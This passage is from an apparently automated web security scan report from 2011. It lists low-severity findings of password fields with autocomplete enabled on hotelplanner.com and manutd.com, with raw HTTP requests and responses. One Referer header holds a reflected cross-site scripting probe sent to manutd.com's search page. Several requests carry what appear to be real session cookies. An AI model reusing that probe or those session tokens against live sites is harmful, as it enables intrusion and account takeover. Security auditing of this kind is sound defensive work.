Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:10:08 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YXwiHh2%2F7WNDUvX0uhP7z%2Fu1ZYaz9gNQxd55IafrcqsKewAgZpMaj5fZabk6MFuDRuvq58o6S2dFSXEquO8K6cAWdvyRuc9JcewxnlHHL8GOYIx9VvQ59CrwhdaIdStBZrU5q4Ul2guClyvts5IXkU8Ih0ABSFc1yfREbdE8%2B7ma2cdK4o8HDAbGpXup2Rud%2FuWVZbsTNKpP8CfTOZ7OhNndhDIMCH%2FJpeMJWPbLEdaMaSYZn4vDHoQNmtnBn6b8J%2Fb6augQoxf00frRkHVbY68KfYJ505LitOqZ3oZ7z%2FwWy8DZZ0x0aep1Yc6ZO1bfNGToKbQA4b3%2BxXEdyray%2BAxRgnHfTdirXBHrIiwYmgWtjP419X8wonEpceXpCxBzAgvZowpzjITfR8pibhKJiXP8ZIktgM27Ko%2FN0FeapHlFd7qCXe40H6spMYjXkuJghhqyYrHCfhKoxOnIURuiKYju5FyTsAf%2FcGCZQJq5Jz5ROykvLbFlG3FMtN8ezy525Y0V8ACsXyGSJX%2BtAj8qMHr8NQ18df5HpjNT18Hj%2BR%2Bh58NwJwwGSDZjCpXVyLIq62qeabC1McUJgXncEdtL96x7CT%2FvNpdhLhQs7YiMdGaBLTHQTiwULvwyjL3vRFAAGqf8FaoHB%2B87GGYPg8Zzjv%2FAPfoqMyv0OJ%2Bvo1UWD4XBr1wWtIBwidOwITrWQUTf6BVJbKeYZmUvJzYcSSdA3UcFUpr9u1XIBJZ%2F0I4DksHfQhFfmwQ00nikj%2FywtBV%2F84%2BElq4XUsM8Gh%2FcAK5W8NIqtn5QRqry6pE1NgaNCX68XLgU6zltzmw4cLFtMMbOsIx7ofy9ssO6wOlJNxZdhfbLc4O7Zj%2BMWlGTqVrC42NkTgj4512OLZ%2Fc6I67UMvxh3Qie%2FlodheV5sPFXIR5FRrKWi4wsUs48W8gfOBJvpOolIwpdDJdTSxjSuRPL01EuNp7z3Dzy3wlaJZQbE6JrU8PlbJc7tBTRWHZ4mRSdH%2FtGgL9yyifCtziMdOGXNw6kftdRVdI%2FGDbzndHQiN35W7VHyoeMFRi%2Bd0F1FkpavfYxfQdNoqwcdwsAEmwMjyALxN7GqyN1qmLPU4%2BEEBPt5ms%2F7RsoZErADPkOg986sTx5Aq%2B86Q6HID1BJLr7mUjVwW%2FTOkTW4s5494hGd%2FgPB5yo0b0OuCALpHxQxAubkIgrz6yNEReexNwFQBY6hvQFMAFVvhYSMd%2FLdChQJHNAANkDJjdsfannaTHlca6HDzStDUKlpg5Rxu4hGW%2F39QUq9dNAvdq6dQirX43mfviJRlxEdXAXSib9a34ZWTPn%2Bq%2F; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:10:09 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 388853
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country
...[SNIP]...
<div id="loginPopup">


<form name="loginform" class="stay_login" action="https://secure.booking.com/login.html?tmpl=profile/slogin&amp;protocol=http" id="login-form" method="POST" target="log_tar">
<div id="login_loading">
...[SNIP]...
</label>
<input type="password" id="password_input" class="input_pwd inputText" name="password" value="" tabindex="772">
<p class="forgotten">
...[SNIP]...
15.7. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Hotel/HotelRoomTypes.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=1&ViewType=List&HotelName=&Rating=&PriceMin=1&PriceMax=9999&btnGo.x=113&btnGo.y=15
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; LOCALE=en%5FUS; CURRENCY=USD; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LANGUAGE=1; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.2.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:29:43 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 229491

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Hotel Availability - Millennium Bostonian Hotel Boston</title>
       <meta http-equiv="Content-Type" content="t
...[SNIP]...
<table cellspacing="0" cellpadding="0" align="left" id="Navbar">
               <form action="/Login.cfm" method="post" name="frmLogin" target="_top">
               <tr>
...[SNIP]...
<input type="text" class="LoginInput" name="Email" >&nbsp;&nbsp;&nbsp;Password <input type="Password" class="LoginInput" style="width:110px;" name="Password">&nbsp;<a href="javascript:document.frmLogin.submit();">
...[SNIP]...
15.8. http://www.hotelplanner.com/Search/Index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Search/Index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=hotelplanner&grp=9701&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.hotelplanner.com%2FSearch%2FIndex.cfm%3FCity%3D%24%7Bcity%7D%26InDate%3D%24%7BdepartureDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26OutDate%3D%24%7BreturnDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26NumRooms%3D%24%7Brooms%7D%26adults%3D%24%7Badults%7D%26State%3D%24%7Bstaten%7D%26Country%3D%24%7Bcountryn%7D%26sc%3DIGoUGo&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=149&pos=5&aii=41baf401-e791-4c75-8143-e95891286e0a&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:10:06 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Set-Cookie: SOURCECODE=IGoUGo;expires=Sat, 31-Mar-2012 00:10:06 GMT;path=/
Vary: Accept-Encoding
Content-Length: 225194


<style type="text/css">
<!--
#waitScreen
{
position: absolute;
left:0pt;
visibility: hidden;
height:100%;
width:100%
}
.Default
{
   FONT-WEIGHT: normal;
   FONT-SIZE: 11px;
   FONT-S
...[SNIP]...
<table cellspacing="0" cellpadding="0" align="left" id="Navbar">
               <form action="/Login.cfm" method="post" name="frmLogin" target="_top">
               <tr>
...[SNIP]...
<input type="text" class="LoginInput" name="Email" >&nbsp;&nbsp;&nbsp;Password <input type="Password" class="LoginInput" style="width:110px;" name="Password">&nbsp;<a href="javascript:document.frmLogin.submit();">
...[SNIP]...
15.9. https://www.hotelplanner.com/Accept/Reserve.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:30:37 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58824

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<table cellspacing="0" cellpadding="0" align="left" id="Navbar">
               <form action="/Login.cfm" method="post" name="frmLogin" target="_top">
               <tr>
...[SNIP]...
<input type="text" class="LoginInput" name="Email" >&nbsp;&nbsp;&nbsp;Password <input type="Password" class="LoginInput" style="width:110px;" name="Password">&nbsp;<a href="javascript:document.frmLogin.submit();">
...[SNIP]...
15.10. http://www.manutd.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Last-Modified: Sun, 02 Oct 2011 12:29:58 GMT
Server: Microsoft-IIS/7.5
LastModified: Sun, 02 Oct 2011 12:29:58 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web4
Content-Length: 26620
Cache-Control: public, max-age=153
Date: Sun, 02 Oct 2011 23:49:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...
<div style="display:inline;" id="toolbarlogin"><form action="/One-United/Login.aspx?redirectPath=/en.aspx" method="post" style="width:505px;"><label for="loginEmail">
...[SNIP]...
</label><input type="password" id="loginPassword" name="loginPassword" /><input type="hidden" id="returnPath" name="returnPath" value="/en.aspx" class="hiddeninput" />
...[SNIP]...
15.11. http://www.manutd.com/One-United/Login.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /One-United/Login.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /One-United/Login.aspx?redirectPath=/en/Fanzone/Competition-And-Polls/Competition.aspx?id={A04F2C18-1A4F-437D-B2BF-26E32C2683B7}&regmode=full HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/en/Fanzone/Competition-And-Polls.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1; CP=null*; __utma=1.1656468293.1317599341.1317599341.1317599341.1; __utmb=1.8.10.1317599341; __utmc=1; __utmz=1.1317599341.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); website#lang=en; ASP.NET_SessionId=dsijc245bi5upj3uvvwiumrc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web7
Content-Length: 21902
Expires: Mon, 03 Oct 2011 00:01:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 00:01:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<div class="login regform LoginContainerStyles">
<form method="post" action="" id="members">
<br />
...[SNIP]...
</label>
<input name="phcontent_0$phoneunitedcontent_0$phcolumn1_1$password" type="password" id="phcontent_0_phoneunitedcontent_0_phcolumn1_1_password" tabindex="6" title="Password:" />
<div class="rule" style="margin-bottom: 15px;">
...[SNIP]...
15.12. http://www.manutd.com/One-United/Login.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /One-United/Login.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /One-United/Login.aspx?redirectPath=/en/Fanzone/Competition-And-Polls/Competition.aspx?id={A04F2C18-1A4F-437D-B2BF-26E32C2683B7}&regmode=full HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/en/Fanzone/Competition-And-Polls.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1; CP=null*; __utma=1.1656468293.1317599341.1317599341.1317599341.1; __utmb=1.8.10.1317599341; __utmc=1; __utmz=1.1317599341.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); website#lang=en; ASP.NET_SessionId=dsijc245bi5upj3uvvwiumrc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web7
Content-Length: 21902
Expires: Mon, 03 Oct 2011 00:01:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 00:01:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<div style="display:inline;" id="toolbarlogin"><form action="/One-United/Login.aspx?redirectPath=/en/One-United/Login.aspx%3fredirectPath%3d%2fen%2fFanzone%2fCompetition-And-Polls%2fCompetition.aspx%3fid%3d%257BA04F2C18-1A4F-437D-B2BF-26E32C2683B7%257D%26regmode%3dfull" method="post" style="width:505px;"><label for="loginEmail">
...[SNIP]...
</label><input type="password" id="loginPassword" name="loginPassword" /><input type="hidden" id="returnPath" name="returnPath" value="/en/One-United/Login.aspx" class="hiddeninput" />
...[SNIP]...
15.13. http://www.manutd.com/Search-Results.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /Search-Results.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /Search-Results.aspx?qs=manutd_frontend&catTxt=&searchText=xss HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/en/One-United.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1; CP=null*; __utma=1.1656468293.1317599341.1317599341.1317599341.1; __utmb=1.4.10.1317599341; __utmc=1; __utmz=1.1317599341.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Last-Modified: Sun, 02 Oct 2011 12:29:58 GMT
Server: Microsoft-IIS/7.5
LastModified: Sun, 02 Oct 2011 12:29:58 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web4
Content-Length: 18228
Cache-Control: public, max-age=511
Date: Sun, 02 Oct 2011 23:55:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<div style="display:inline;" id="toolbarlogin"><form action="/One-United/Login.aspx?redirectPath=/en/Search-Results.aspx%3fqs%3dmanutd_frontend%26catTxt%3d%26searchText%3dxss" method="post" style="width:505px;"><label for="loginEmail">
...[SNIP]...
</label><input type="password" id="loginPassword" name="loginPassword" /><input type="hidden" id="returnPath" name="returnPath" value="/en/Search-Results.aspx" class="hiddeninput" />
...[SNIP]...
15.14. http://www.manutd.com/en.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /en.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /en.aspx HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/Splash-Page.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1; CP=null*; __utma=1.1656468293.1317599341.1317599341.1317599341.1; __utmb=1.1.10.1317599341; __utmc=1; __utmz=1.1317599341.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Last-Modified: Sun, 02 Oct 2011 12:29:58 GMT
Server: Microsoft-IIS/7.5
LastModified: Sun, 02 Oct 2011 12:29:58 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web6
Content-Length: 26620
Cache-Control: public, max-age=328
Date: Sun, 02 Oct 2011 23:49:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...
<div style="display:inline;" id="toolbarlogin"><form action="/One-United/Login.aspx?redirectPath=/en.aspx" method="post" style="width:505px;"><label for="loginEmail">
...[SNIP]...
</label><input type="password" id="loginPassword" name="loginPassword" /><input type="hidden" id="returnPath" name="returnPath" value="/en.aspx" class="hiddeninput" />
...[SNIP]...
15.15. http://www.manutd.com/en/Club/Sponsors.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /en/Club/Sponsors.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /en/Club/Sponsors.aspx?sponsorid={F745DA14-CB5E-4A81-816A-8DB410E47A75} HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://aka-cdn-ns.adtech.de/apps/69/Ad2515525St3Sz2384Sq101142722V0Id38/COM_Sponsor_Footer_4.swf?targetTAG=_blank&clickTarget=_blank&pathTAG=http%3A//aka-cdn-ns.adtech.de/apps/69/Ad2515525St3Sz2384Sq101142722V0Id38/&closeTAG=javascript%3AcloseAdLayer2046906%28%29&openTAG=javascript%3AopenAdLayer2046906%28%29&expandTAG=javascript%3Aexpand2046906%28%29&collapseTAG=javascript%3Acollapse2046906%28%29&clicktarget=_blank&clickTarget=_blank&clickTARGET=_blank&CURRENTDOMAIN=www.manutd.com
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1; CP=null*; __utma=1.1656468293.1317599341.1317599341.1317599341.1; __utmb=1.6.10.1317599341; __utmc=1; __utmz=1.1317599341.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Last-Modified: Sun, 02 Oct 2011 12:29:58 GMT
Server: Microsoft-IIS/7.5
LastModified: Sun, 02 Oct 2011 12:29:58 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web6
Content-Length: 21722
Cache-Control: public, max-age=537
Date: Sun, 02 Oct 2011 23:59:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<div style="display:inline;" id="toolbarlogin"><form action="/One-United/Login.aspx?redirectPath=/en/Club/Sponsors.aspx%3fsponsorid%3d%257BF745DA14-CB5E-4A81-816A-8DB410E47A75%257D" method="post" style="width:505px;"><label for="loginEmail">
...[SNIP]...
</label><input type="password" id="loginPassword" name="loginPassword" /><input type="hidden" id="returnPath" name="returnPath" value="/en/Club/Sponsors.aspx" class="hiddeninput" />
...[SNIP]...
15.16. http://www.manutd.com/en/Fanzone/Competition-And-Polls.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /en/Fanzone/Competition-And-Polls.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /en/Fanzone/Competition-And-Polls.aspx HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/Search-Results.aspx?qs=manutd_frontend&catTxt=&searchText=xss75931%3Cscript%3Ealert(document.location)%3C/script%3E14fb8fbf954
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1; CP=null*; __utma=1.1656468293.1317599341.1317599341.1317599341.1; __utmb=1.7.10.1317599341; __utmc=1; __utmz=1.1317599341.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
